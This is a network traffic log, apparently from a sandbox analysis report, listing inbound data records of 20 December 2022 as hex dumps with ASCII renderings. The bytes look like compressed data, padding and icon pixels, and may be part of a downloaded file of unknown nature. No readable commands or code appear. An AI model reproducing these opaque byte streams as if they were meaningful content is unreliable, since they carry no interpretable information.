2022-12-20 13:15:37 UTC	371	IN	Data Raw: bd 49 12 fb df 18 c0 8d c0 78 7c 70 6b 6c 1a fe d5 47 b5 e0 b4 5d fa 0f 0b c7 2b 14 0a db cb db 77 a7 bb 16 dc f8 8c ef ac 74 92 cb ba 71 67 0a 46 e4 c1 e4 36 cd 78 8e 8e 86 85 94 e4 69 aa fa a2 44 60 4e e1 4a e4 96 38 ad ba 3e 1d af 50 63 33 72 ad 26 7f 99 44 6a 63 70 25 98 0f 81 48 2e 93 78 b6 e2 38 89 6b 6b a5 b9 61 be 69 30 f2 bf 17 93 d8 f9 b0 c9 25 4c a8 1b 72 b4 3f cf 8d 82 f4 fb 74 04 f9 52 66 55 0e 1c 94 7c fc 3a 0d 3f 13 53 89 a4 d4 03 03 e3 e0 7f 3b 23 4f f4 a4 6f 33 0a 4c 55 1f aa ad 69 35 10 1d a0 e5 a9 b2 e9 b3 77 55 17 cf 4c 1f 76 d3 4b 12 51 a1 01 3c 2a dd c6 ec 26 7d b6 a2 64 16 0e a7 57 71 0d a1 b4 ea c2 d5 f2 46 9e f9 aa a6 34 3e 0f d0 73 c9 6b 9c fc 5b b4 2f 7e b6 15 a9 41 98 80 62 f8 00 0e 75 19 87 a2 d9 81 b3 cc a7 05 55 23 30 03 85 Data Ascii: Ix\|pklG]+wtqgF6xiD`NJ8>Pc3r&Djcp%H.x8kkai0%Lr?tRfU\|:?S;#Oo3LUi5wULvKQ<*&}dWqF4>sk[/~AbuU#0
2022-12-20 13:15:38 UTC	387	IN	Data Raw: 9a 78 ed ee fe 69 4d 3c 28 b9 fa e8 14 9a e7 0c ff 00 58 2b 39 c0 da 89 0e 7a 79 2f a7 a8 46 9d d0 5c 2e af fa bb f7 59 b6 ad 60 c2 0e 71 81 21 7b eb 8e d2 92 d6 90 67 f2 98 6e e7 10 2c 7d 28 d5 fd c9 81 ac 4e 7e 03 4d da 4b cc cc 80 a3 9f d9 7c da 54 36 49 09 d7 0e 4e 3f 14 a9 ca e3 f7 20 29 a7 21 b1 f8 14 fe eb 54 2a 10 19 b8 a0 5a 76 42 3f 6b 30 18 34 4e 37 35 98 65 e5 4d b3 72 12 c1 8a 33 e6 1e a6 79 df 51 d0 78 b7 e5 c2 1e b1 e9 99 18 2d 28 26 2d 32 eb fd 15 41 16 83 af ca 09 91 1e 28 ec 18 25 8d 6c 14 79 da 7c 52 c8 60 70 50 05 71 ed a3 48 4e 1f 72 4c 4a 45 e9 3c b7 2f db 3d 6f 64 12 fe f2 b5 ac de bb d4 9a 46 d6 cc df ac 19 8e b1 70 fe 77 b2 59 d5 19 51 a4 fa 3b d9 77 87 67 66 77 f9 38 88 1a b2 91 39 55 0f 73 07 48 55 a4 96 a6 13 4c ae 14 17 59 85 Data Ascii: xiM<(X+9zy/F\.Y`q!{gn,}(N~MK\|T6IN? )!T*ZvB?k04N75eMr3yQx-(&-2A(%ly\|R`pPqHNrLJE</=odFpwYQ;wgfw89UsHULY
2022-12-20 13:15:38 UTC	403	IN	Data Raw: 5c b7 8d 3c 0e ae 70 90 b4 9d aa 5a 5f 97 81 80 1c 34 82 0e 78 7f 76 0f d7 cd a2 7c 35 36 03 43 d5 0a 71 77 71 1a 71 0c dc 1d d7 0d 0f 05 71 ff 11 51 98 f9 6f 80 3f 15 e4 c0 f2 6e 74 b1 75 ce 10 6c da c8 4e d8 ac ac 2e ce 75 99 e4 c3 f2 e1 a9 e1 6d 62 e6 7c 1a f0 40 99 4d 28 a9 d7 2f 9c 9a 8d 8d b2 92 d7 c2 75 04 fd 9a 48 c1 b8 09 22 bd fe da 0d 1c 5b 01 94 3d 13 c9 31 4a da d0 b2 b6 f0 90 41 ea 5a 2c ea ca 09 b0 08 49 99 14 e7 12 4a 8f 80 44 13 87 25 67 ce 7c 24 fc 25 01 83 41 79 c8 05 45 48 5c 86 93 d0 3b 15 65 dc ad 80 30 92 56 4c f4 94 b1 11 d7 b4 e0 b6 fe b9 8a ac d6 18 4a 0c 18 1f 8c be 19 8c 07 1b c4 ec 21 79 49 f6 02 e7 61 79 2e 15 00 ff 07 d9 4c 7f 8e c9 ce ab 63 06 9b cc 9c 4b 2f 5e b2 12 43 28 56 63 17 51 c7 b2 77 43 8d 40 9f b8 76 2d e9 70 66 Data Ascii: \<pZ_4xv\|56CqwqqqQo?ntulN.umb\|@M(/uH"[=1JAZ,IJD%g\|$%AyEH\;e0VLJ!yIay.LcK/^C(VcQwC@v-pf
2022-12-20 13:15:38 UTC	419	IN	Data Raw: e7 d0 97 19 cf 85 57 b0 be 53 0a 24 5c d1 10 d7 b8 e1 51 b2 95 82 ff 2a f8 ba 86 0f c8 93 8e db 78 20 33 d5 c4 f5 c2 50 76 62 82 e9 00 dc 9f 87 da 17 51 95 6a 4b 9e 73 4f 7a 94 a2 c3 e7 86 9e 34 da 2a d8 73 15 6d 4f f3 ac 77 22 f7 43 ab c7 80 11 38 af d7 a0 f8 03 a7 6a 67 b7 32 85 97 5c e9 13 4b ba 4e db 3b 19 4e b3 48 e5 48 ae 2f 62 39 8a 34 ae a5 6b bf ea 73 c1 2b 1b 20 49 e2 b2 97 36 d7 80 6d 00 d1 18 5d 02 1a eb 78 d5 b7 4b f2 d9 58 8c e9 01 ad ff 8f f7 46 71 9b 47 73 63 41 1a 02 58 96 9c 84 7b a5 07 79 24 b2 88 bc de 48 ee b5 d5 02 02 34 59 14 b2 72 5f a9 d0 8b 81 a8 ad b2 e2 f9 51 e7 72 8d 13 16 f7 8a 04 9c 36 90 b4 12 d5 59 4e 2b 86 a8 4a e2 6b 8c 49 58 4e 90 fa ee 73 23 1f bc f9 f4 8c 41 aa c1 ff 19 e1 5b fa 35 5e c6 9b a3 d4 4b e9 ec 3d 65 2f ab Data Ascii: WS$\Qx 3PvbQjKsOz4smOw"C8jg2\KN;NHH/b94ks+ I6m]xKXFqGscAX{y$H4Yr_Qr6YN+JkIXNs#A[5^K=e/
2022-12-20 13:15:38 UTC	435	IN	Data Raw: 6b 78 b0 07 99 53 d2 bc e1 ee 74 e3 4c a7 e1 21 b8 53 a9 be 7d 99 a0 fd de c3 1a 56 02 42 fe 1c ab 6c ab 43 ad ad 78 f3 5d 36 0f 6d 07 62 01 dd 45 03 19 b1 e2 38 bb a4 f2 90 40 2f 95 bb af fb bd 33 f3 3f 96 08 78 66 03 73 13 49 e7 55 86 9b 8f 72 0f 51 1b c6 e9 e2 d4 05 fd 51 c0 4c c6 9e c4 4c b1 05 6a 77 e0 6e f6 09 4c b0 ad 16 de 75 ca 10 58 9b 39 b6 dd ce 22 65 a7 ea b1 92 19 56 8d 83 1b 03 1a ed 63 83 92 7f 2a 0f be d8 92 a6 59 2a ce 52 67 8a 34 ae 34 a7 d2 af 1e 4e 8c 08 42 7c 77 1b 30 b9 16 35 8e 72 46 76 52 9d 31 12 67 54 2e f1 af 80 77 37 46 c3 6e 4c 6c 6c ea 9e 82 35 6a 62 0d 5c 32 c1 69 2e fb 45 d7 e8 b9 26 10 bd 69 fe ce 1a b2 69 fb 00 59 b9 db a8 96 2e 36 0b 29 a0 1f fc b1 fa ea 85 8c cf 0f c3 8c e5 cb 1c f5 80 7c 57 e6 23 f9 08 91 40 8a 2c a2 Data Ascii: kxStL!S}VBlCx]6mbE8@/3?xfsIUrQQLLjwnLuX9"eVcYRg44NB\|w05rFvR1gT.w7FnLll5jb\2i.E&iiY.6)\|W#@,
2022-12-20 13:15:38 UTC	451	IN	Data Raw: a4 8c 27 6b 35 d0 56 a0 b2 5b 60 f6 3a e5 80 f0 37 e4 93 b5 6f 83 58 d2 80 86 ea 4f a7 08 05 4c 0d 26 7e 99 ed ae 21 7d 57 b4 c5 53 bd e8 1d bc 48 a2 c8 c3 8c c8 1b fc cc 00 84 46 03 cf 48 a3 49 fb 50 41 9c f3 bf 23 ec be ba 53 f4 62 38 68 11 1c 36 05 99 57 5b 87 7b d8 c9 0b f7 60 a7 94 91 5e 21 a0 f1 58 7d a4 fc 82 7b c2 d1 29 48 30 29 a2 4d 72 49 42 b4 b2 7b 39 f2 f0 a2 2b e5 9f 52 e8 b1 15 b8 e1 be 13 dd a3 f2 ed 4f fc cb b3 38 78 a9 60 fb d3 bf 2b b8 d9 2a 06 83 f8 59 bb 19 36 59 f1 f5 9b 14 bf 69 4a ce a0 d8 69 38 86 0d bb 88 45 ed 50 c4 ae a8 af e6 6e 39 4d 75 fb c2 2b 15 ab 66 2a 60 6e 81 c6 63 4e 1f 86 ce 4f 92 c2 a9 00 46 c7 da 77 96 b6 16 6b 1c d2 21 40 4c 87 32 58 f5 5a aa 22 68 4a ed 32 f8 60 4f da 8e 5b 12 58 95 36 d7 f3 d7 48 de 5d 00 65 70 Data Ascii: 'k5V[`:7oXOL&~!}WSHFHIPA#Sb8h6W[{`^!X}{)H0)MrIB{9+RO8x`+Y6YiJi8EPn9Mu+f`ncNOFwk!@L2XZ"hJ2`O[X6H]ep
2022-12-20 13:15:38 UTC	467	IN	Data Raw: ac 5c 25 ad 8d 55 62 61 bd 4b 53 51 9c 6c d7 a6 b8 1d 40 97 3c 3b 46 37 e5 38 7e 43 cf 3f f4 f3 04 bd 65 01 7a 0d 33 cb d6 9d 22 43 8d f5 8c e1 cd 2c 35 8c dd f4 62 34 15 10 f1 a1 3a 06 94 43 c3 f0 a6 2b 4d 62 bc 49 9f 0b c1 96 19 e4 88 bf bc cf ca 3f 55 c1 3d d2 59 b9 a6 a0 58 b9 17 e5 d1 43 36 21 79 03 c1 4c 06 69 56 76 b4 17 00 53 61 fc 45 ba b9 9b 07 e9 07 3e 64 5d 52 c0 bd 96 05 04 e4 d6 e3 5f a7 aa 8e 32 e7 68 88 74 d6 f4 6e 06 18 e6 7e 25 e6 c6 f1 64 36 ef cb 45 35 a9 a5 bf cf 51 60 39 a6 eb eb 88 4e 42 3a 18 19 e8 c6 83 ad 87 c1 35 6f fb df 37 c9 fc 3b ae 85 ff 9d 25 4d 3a 0a f8 6c 96 cb ee 34 7b 1b df bb b8 fe 19 dd 7d 7b 2a d1 65 a0 60 ad 97 63 82 97 44 1f 2d 2a 9c ec ab a6 4d a6 ae 12 c4 35 f3 26 83 78 2b f7 4b ad 9e 64 b2 bd 2d 14 de be 61 dc Data Ascii: \%UbaKSQl@<;F78~C?ez3"C,5b4:C+MbI?U=YXC6!yLiVvSaE>d]R_2htn~%d6E5Q`9NB:5o7;%M:l4{}{e`cD-M5&x+Kd-a
2022-12-20 13:15:38 UTC	483	IN	Data Raw: 68 a4 c5 db e9 69 4e 4f 7d 73 d1 d9 48 62 c1 f2 5a 37 35 46 89 9d 05 b7 80 db cb 7d bb 49 41 7c 29 9c 30 50 09 f7 1b 81 29 fa eb 28 87 4d 5b 09 4b 8d 4f ed a5 35 a9 04 34 5b 62 7b 06 b5 1b d6 58 fe fe 03 b9 46 7d 67 20 80 26 d7 9b f8 43 58 f9 a6 2a 99 16 1e eb 6f 58 f3 42 42 35 8f 7c 60 0e 08 79 0f e5 bb d8 9d e7 54 9c 74 c3 77 24 ce 5c a3 7e a7 d7 37 3e 8c 3b 55 38 16 4e 5e b9 b1 fd a1 da 45 71 f0 7b 3d f7 2d d4 1d 7f bb a3 2e d6 1c 56 0e c4 3c 29 1b d4 ea 47 84 69 ef e8 b9 62 6e 15 03 8b 38 60 1d eb dc 71 a0 5f e1 7d 11 29 29 31 69 20 84 13 c9 56 0b ce 15 62 0e 09 6a 6e 68 83 5d 69 12 30 1f 19 df 76 67 0a a0 5a bd 62 d5 af 4f f7 66 b6 7b bb 4e f6 d7 ce 63 38 1b 3f 3c dc cb fa 38 7b f3 08 76 3f d9 b3 ef 17 61 35 94 b7 41 ad 46 ea b5 76 cb f9 a3 da b8 0f Data Ascii: hiNO}sHbZ75F}IA\|)0P)(M[KO54[b{XF}g &CX*oXBB5\|`yTtw$\~7>;U8N^Eq{=-.V<)Gibn8`q_}))1i Vbjnh]i0vgZbOf{Nc8?<8{v?a5AFv
2022-12-20 13:15:38 UTC	499	IN	Data Raw: 50 98 ee f8 4f 74 71 43 cf d7 2a f1 bc bd cc 04 9f 60 3a c9 54 3f 21 df 42 3e c4 f7 39 72 04 85 b3 1e 34 dc bd a4 02 fd 34 a7 f3 db 07 5b 18 c1 f4 5c 66 c0 59 cf e0 17 5d 50 16 3a f1 bc 41 eb 1f 07 6e e8 db 4f 26 06 a0 6f 78 9b 8e aa 65 74 f6 78 88 24 53 dc 80 ce 38 40 ae d2 61 93 ce db 8d 42 d5 f8 d0 f3 c6 4f d0 fa a7 1b 3c 86 96 42 a8 e0 6c 58 3b f0 69 6d eb e6 d0 2e 2f fc e1 7c 4a 31 50 88 e8 f3 e7 56 7c 60 c4 f2 46 43 54 01 e8 42 0d e4 69 6a 4e 70 1a 25 c0 21 69 c5 2c 5e d4 1e 0d ab f8 6c ce 50 db ef 60 5e 48 78 c9 e8 87 7f 12 f4 b3 5a 1f 84 5e 91 b5 21 5a 40 b8 77 74 9b a2 cc 5f 37 fc 6f ac 70 37 d5 c4 ba 17 2b 0c 5f 14 12 6f 3a 39 bb af 4d 2b 6a cc dc 7f d7 81 6a 47 ab 35 f5 7f e5 d1 dc cc 78 15 a4 f5 b3 a3 da 44 2d 60 f5 dd c7 0b c7 4c ff ac 3f 1c Data Ascii: POtqC*`:T?!B>9r44[\fY]P:AnO&oxetx$S8@aBO<BlX;im./\|J1PV\|`FCTBijNp%!i,^lP`^HxZ^!Z@wt_7op7+_o:9M+jjG5xD-`L?
2022-12-20 13:15:38 UTC	515	IN	Data Raw: e0 70 a2 43 b0 98 c8 a8 0f a6 9b 7d 2d f7 4d 1f 86 ab 68 91 ca 9f 0b 5d e8 85 eb 64 c2 1c dd cc ff b6 1a 84 16 aa fb 91 79 b0 ef 89 6a 59 e3 c0 73 f4 da 2d 2a 2e 73 f5 25 97 ef d5 8e 38 ac 68 e7 f8 a6 fa 50 f9 1d 25 4e 36 d7 ab 81 c7 3d ad cb 24 c4 da 28 fe db 68 28 ef 3c 68 51 a6 a4 f5 b8 4e c7 5b 0b ba 89 74 b6 4f 5b 38 36 e5 56 c1 a7 5f 8f 56 57 3a 06 e7 32 7c e7 ea 12 68 7b 0f 0e 3d f0 a0 0a 4b 08 84 49 66 47 b1 db 2d f9 2e 17 f0 ab b8 17 fd e2 19 a6 02 4a 11 93 c6 26 3d 59 c5 6d 29 a6 30 3f 63 70 26 5e e0 27 5a 4e 67 5a 42 c0 f4 9b fb 24 97 bf 0c d2 2e 64 31 eb d4 6c 7d 6e ee 83 66 94 77 27 c0 b4 b3 c9 67 c6 ba f2 01 08 0a 2b bb 34 2e f3 6b 57 8e dd a1 c1 09 ab a4 74 dc 36 30 35 81 6f e2 fc 19 3a 10 5f ea 9e 70 67 e4 e1 e1 f7 01 10 56 48 53 41 65 5f Data Ascii: pC}-Mh]dyjYs-*.s%8hP%N6=$(h(<hQN[tO[86V_VW:2\|h{=KIfG-.J&=Ym)0?cp&^'ZNgZB$.d1l}nfw'g+4.kWt605o:_pgVHSAe_
2022-12-20 13:15:38 UTC	531	IN	Data Raw: 45 1e cf be 1d ad 4f 1d 4c 0c 02 8a c6 3a b0 30 e3 81 8c 01 12 0c 38 af bf 8e 17 d6 e0 2b 90 04 2d 28 d2 38 8a 0c d5 29 2d 17 f0 06 a1 75 20 86 c0 17 7f 0b 9d 55 57 74 7b 34 23 ff 73 6c 89 67 41 a1 37 cd bd a4 6c 4b a5 82 47 eb 3c 09 19 57 ff 84 a3 60 43 99 6f c2 53 c2 8f a0 72 4d 78 ac e4 06 2a 18 1e a3 ba 8a 73 d8 15 3a 88 e1 ca 7d 43 f2 54 ae d8 ca fa 2f 41 d8 81 55 45 02 a3 13 b4 85 65 27 e8 81 39 c6 dc 4e 32 b2 11 32 f3 bd df 95 f6 f9 ae 1f fd 70 4a 72 fd 72 2f 0d ec 04 78 bb 18 ef 13 42 12 84 31 2e af 7d 49 dd e8 64 1e 4e 1b 91 df 7a 72 7f 8d 2b 43 4a 4c 05 db dc 8c a6 ff 5f a3 57 99 e2 59 70 8a 01 cb 1f ad fa d9 3d 6b 23 82 cc da 6f 2a e1 4c 5d 7a 8f 22 33 30 08 34 0b 10 93 e0 6b d3 1e 42 be 1b 6f ac d6 8c a7 4f 15 dd 00 1b 82 df 92 69 41 47 cc fc Data Ascii: EOL:08+-(8)-u UWt{4#slgA7lKG<W`CoSrMxs:}CT/AUEe'9N22pJrr/xB1.}IdNzr+CJL_WYp=k#oL]z"304kBoOiAG
2022-12-20 13:15:38 UTC	547	IN	Data Raw: bf 7e fd 95 2b 57 80 fb cf 7f fe f3 40 c6 ad d8 e4 97 73 69 88 d3 c5 e2 0c b1 24 43 c2 e4 30 d2 3c a9 ac 48 26 2b 91 11 33 2d 27 69 01 f9 ec b9 88 ab e3 86 41 83 2f 2c 05 a0 e1 21 5c 14 a9 eb cb ba 50 2e 2f 90 23 71 4b 66 91 4c 52 5f 5f ff e5 97 5f 7e f3 cd 37 14 37 df b8 5f 76 69 6b 88 53 c5 92 34 09 b3 85 61 32 18 69 96 14 25 db 2a 93 6f 63 11 c0 4c 41 1c 50 80 a6 ea f9 34 ae 82 5b 29 70 52 60 cd b5 c7 6a 9d 3e ac f3 e5 b2 3c 19 b3 8a 11 7b 89 37 6c d8 70 e3 c6 8d af be fa 8a 73 92 57 43 da 1a e2 64 b1 24 45 c2 a4 31 60 2d 4d 97 4a 33 a4 b2 4c 99 2c 9b 2d 10 cf 63 0f 70 1e f1 e7 d2 38 1f 37 b5 6f e0 a6 45 75 8d af c2 b2 f9 ac f3 e4 b2 6d 32 69 9a 54 12 28 11 1a 08 f7 ec d9 f3 c5 17 5f f4 eb 24 2f a9 b4 35 24 89 12 26 99 61 52 18 cc 14 d8 4f d9 16 19 66 Data Ascii: ~+W@si$C0<H&+3-'iA/,!\P./#qKfLR___~77_vikS4a2i%*ocLAP4[)pR`j><{7lpsWCd$E1`-MJ3L,-cp87oEum2iT(_$/5$&aROf
2022-12-20 13:15:38 UTC	563	IN	Data Raw: e3 61 6a 1a 63 6f 5f e1 e0 00 ca a4 1c 1d ab c1 da d9 b9 d6 d9 b9 ce d9 19 ac 1b d8 17 d0 81 75 b3 9b 1b c5 dd e9 e5 d5 cd be a2 40 1d b7 2a 68 7e 29 89 f7 c2 55 94 32 87 8f df e0 c9 fc 31 95 39 a0 2f 5e 4c 2c 65 d1 a2 cb a3 2c ed 6a 7b 5a 8f 7e dc 7b ec 51 ef b1 4f 7a 8f 73 c4 3f 3b eb d2 eb 21 6d d3 61 76 a8 81 46 4b cc 95 8b d3 59 d0 9b 65 e2 4d bc da 28 13 2e 65 46 8a 04 e8 7b f1 f1 a5 d1 d1 15 4b 97 56 cd 99 53 3d 65 4a bd 9f 5f 8b 87 c7 6e a4 00 67 e7 bd ce ce b8 81 00 86 5c d0 00 ca 70 54 f6 a0 2f d5 d7 8f 14 0f d1 0a d6 97 83 32 2d 8d 0a 76 d1 87 39 aa ab ab e9 c7 9a 9a 1a ee 23 16 3e b9 7a f5 6a 6d 6d 1d 7d fd 19 36 36 99 98 8f 51 4e 4e d5 6c 11 d6 2e 2e 75 2e 2e f5 2e 2e 0d d0 b5 92 75 8b bb fb 2e 0f 8f 7d 9e 9e 9d 9e 9e c4 4c 58 e2 c7 95 ac 55 Data Ascii: ajco_u@*h~)U219/^L,e,j{Z~{QOzs?;!mavFKYeM(.eF{KVS=eJ_ng\pT/2-v9#>zjmm}66QNNl..u....u.}LXU
2022-12-20 13:15:38 UTC	579	IN	Data Raw: 07 01 a0 3b e3 cf 43 00 e8 ca f8 73 11 00 fa 32 fe 54 04 80 ee 8c 3f 0f 01 60 08 e3 cf 41 00 e8 ce f8 f3 10 00 ba 32 fe 5c 04 80 fe 8c 3f 0d 01 60 08 e3 cf 41 00 e8 ce f8 f3 10 00 ba 32 fe 5c 04 80 21 8c 3f 07 01 a0 3b e3 cf 43 00 e8 cb f8 53 11 00 ba d9 3c 5f 9e f1 e7 f1 ea da 37 40 6e 9b 6b 4b 36 fe 5c 04 80 93 5c 1f fe f2 fb ec bc 6c fc 53 12 00 ee ec 2e a3 6f ef bb f3 b2 f1 4f 4b 00 78 a9 63 46 df 3e 66 e7 65 e3 9f 9a 00 70 e0 94 d1 b7 8f dd 79 d9 f8 a7 27 00 bc 70 9f e1 1f 5c cb f8 53 10 80 e2 7a 8e fe c5 35 8d 3f 0d 01 28 68 c4 e8 77 ae fe fc 73 2c bd 36 f6 de 66 fc eb 13 80 22 c6 8e fe fa e7 ba f6 eb 85 b7 19 ff 1c 04 e0 c2 9d 73 f8 11 0b 3f 08 b4 fb b2 f1 4f 47 00 2e d0 b9 47 7f 13 e3 9f 9f 00 5c 88 59 46 bf 65 fc 39 08 40 62 b3 8d 7e cb f8 f3 10 Data Ascii: ;Cs2T?`A2\?`A2\!?;CS<_7@nkK6\\lS.oOKxcF>fepy'p\Sz5?(hws,6f"s?OG.G\YFe9@b~
2022-12-20 13:15:38 UTC	595	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2022-12-20 13:15:38 UTC	611	IN	Data Raw: a9 a7 a4 ff 8c 89 85 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff c6 c4 c2 ff c6 c4 c2 ff 8c 89 85 ff c6 c4 c2 ff c6 c4 c2 ff 8c 89 85 ff c6 c4 c2 ff c6 c4 c2 ff 8c 89 85 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 ff 8c 89 85 Data Ascii:
2022-12-20 13:15:38 UTC	627	IN	Data Raw: fd fd fd fd fd 08 86 08 aa 08 aa 08 08 aa 08 08 a6 86 08 fd fd aa fd fd 86 fd 86 36 0e 0e 0e 32 08 fd aa fd fd 86 fd fd aa fd aa 37 63 5f 3b 0e 08 fd 86 fd fd 08 86 ab 86 08 09 5e 09 63 5f 36 86 fd aa fd fd aa 4c 4c 4c 48 08 5f 5f 5f 5f 5f 08 fd 08 fd fd 08 70 9d 99 4c aa 86 08 aa 08 08 aa 08 86 fd fd aa 70 a6 9d 70 09 7c 7c 54 03 54 54 03 aa fd fd 08 70 cc a6 70 aa 7c cb cb ca ca ca 54 08 fd fd 08 94 94 70 70 09 80 cf cb cf cb ca 54 86 fd fd 86 aa 86 08 aa 08 a0 d0 cf cf cb cb 7c aa fd fd 08 fd fd fd fd 86 a4 d0 d0 d0 cf cf 7c 09 fd fd aa fd fd fd fd aa a4 f6 d0 d0 d0 d0 7c aa fd fd 86 fd fd fd fd 09 a4 a4 a4 a5 a0 a4 7c 08 fd fd 08 aa 08 86 08 aa 08 86 08 aa 08 86 08 aa fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd ff ff 86 fd 80 01 fd 08 b4 05 fd Data Ascii: 627c_;^c_6LLLH_____pLpp\|\|TTTpp\|TppT\|\|\|\|
2022-12-20 13:15:38 UTC	643	IN	Data Raw: 60 32 91 25 73 1f 57 00 88 86 80 14 f8 ce 11 10 04 f7 17 f8 bf 6a c0 7c 81 95 83 93 ce 0b bc f6 b5 af 5d 9f cf b9 b5 5b 3f f4 8f 0d d8 85 8d aa 00 d4 e0 4f f9 cf f6 7c d0 55 00 7c c6 77 7c c8 97 99 03 00 be 9e 05 00 27 bc 8f 5f d8 c0 31 dc 59 7a 56 20 ce 8d 6e b4 7c dc 27 b4 07 f7 0d c3 19 7f 3c 3b 88 d3 b2 ff 9f c3 65 47 41 24 23 70 76 50 45 00 39 ea 1c 40 26 00 97 86 00 c6 9f 48 58 45 00 49 6b 25 80 c0 11 81 94 b6 11 81 2a 00 11 81 0c 03 ea 50 a0 06 bf 9f f3 7c 80 e0 a9 15 c0 71 04 c0 10 20 02 20 e3 fb bc b9 12 10 98 7e a6 1a 70 5e 43 05 43 02 9f 3b e9 bc 80 c9 41 73 0c 11 81 54 02 a9 02 08 00 db 55 01 a8 c1 0f 75 12 b0 0a 40 2a 00 3e cc 10 20 15 40 0d fe ca 05 ef 71 3e d5 89 2a 61 d3 7d 01 38 37 ba d0 f2 71 9f d0 1e dc 27 0c 67 b8 01 e8 46 1b 80 4c de Data Ascii: `2%sWj\|][?O\|U\|w\|'_1YzV n\|'<;eGA$#pvPE9@&HXEIk%P\|q ~p^CC;AsTUu@> @q>*a}87q'gFL
2022-12-20 13:15:38 UTC	659	IN	Data Raw: fd aa 8e 04 bf b6 a4 ec d7 5e 7d 48 7f e6 ec 5f 6d 10 bb c4 4e 6c 56 b3 7f ec 5a b3 7f 17 fc 11 80 39 f8 23 00 d5 d7 de e7 5c ce 8b 13 47 94 ff 6f 1a dd 6f f9 b6 cf 68 0f ee 3b 86 13 6f b4 2d 18 ea 30 40 86 90 55 10 07 31 1e fa d0 87 5e 14 80 2a 02 55 00 22 02 55 00 32 0c 00 e4 ac 55 00 e2 22 31 84 d8 dd 30 60 1e 0a 24 5b 0a 9e 88 40 86 00 b5 12 88 00 18 06 bc 23 2a 80 4c f6 75 33 fd ae 9f e0 d7 b6 04 3f a4 3f 35 f8 d3 6f 36 98 b3 3f c4 6e 29 fd 13 fc 10 7b a7 f4 9f b3 7f 15 80 1a fc 11 00 be f6 bb cf 38 37 2e 6c 51 fe 9f 99 ed bf 15 ed c1 7d c7 95 57 5e 79 8f ce 89 19 06 dc f1 8e 77 5c cf f8 ca 2e 19 06 d4 cc 50 45 60 ae 02 66 11 f0 f9 88 40 ad 02 10 0b 52 c2 a6 a4 45 72 48 d9 1b 11 10 14 11 81 04 4c 57 05 24 f8 6b 15 50 05 c0 fd fc 37 85 00 98 ec b3 63 Data Ascii: ^}H_mNlVZ9#\Gooh;o-0@U1^U"U2U"10`$[@#Lu3??5o6?n){87.lQ}W^yw\.PE`f@RErHLW$kP7c
2022-12-20 13:15:38 UTC	675	IN	Data Raw: 78 9a cf c2 f2 5c 78 a2 d6 ca c3 54 bd 99 a4 5b 3b 08 82 25 b4 5d 86 43 30 25 b9 6e 0f 42 3d e8 c1 61 55 36 e2 ba 75 fe 9f e8 70 c6 0a 8a b6 ec f6 5f 18 f8 9e 4f 10 4e d1 5b b1 5b 08 8f cb db 79 fe f1 af cc af da 3a 63 0f ed 43 e2 82 59 e1 90 da 7e e6 70 b9 d8 cb 64 ad 9f fc 74 fe 75 fa 57 7f 61 f6 4b 47 e3 15 f9 bf fb 4d 47 2d af ed 31 73 3c ae 45 8d c4 56 e5 bd 87 96 14 e3 f1 15 e8 e2 12 8c 3d 0c e4 db 4d b3 87 f8 c3 69 1d a7 82 b4 9b 88 52 33 7f 75 69 0b bf 96 36 e1 cf cc 77 1f a3 91 9f f6 4d 7d 8d fb 1b 78 42 df 49 f0 0f f6 fe b8 61 9e 7b 8f 2a dd 21 fb c4 b1 8d 58 80 3d 4e e5 1f f0 13 5f 13 78 ea f5 0e bb a2 69 e6 6f b5 db 5a bc 63 ca 68 fe f0 1f 32 8c 73 90 77 9f a9 26 bd b7 e1 cf 8b 75 2b 8f 08 5b 5c 59 35 d2 de dc 4d 35 96 9e b0 e7 6a 4c 55 42 c8 Data Ascii: x\xT[;%]C0%nB=aU6up_ON[[y:cCY~pdtuWaKGMG-1s<EV=MiR3ui6wM}xBIa{*!X=N_xioZch2sw&u+[\Y5M5jLUB
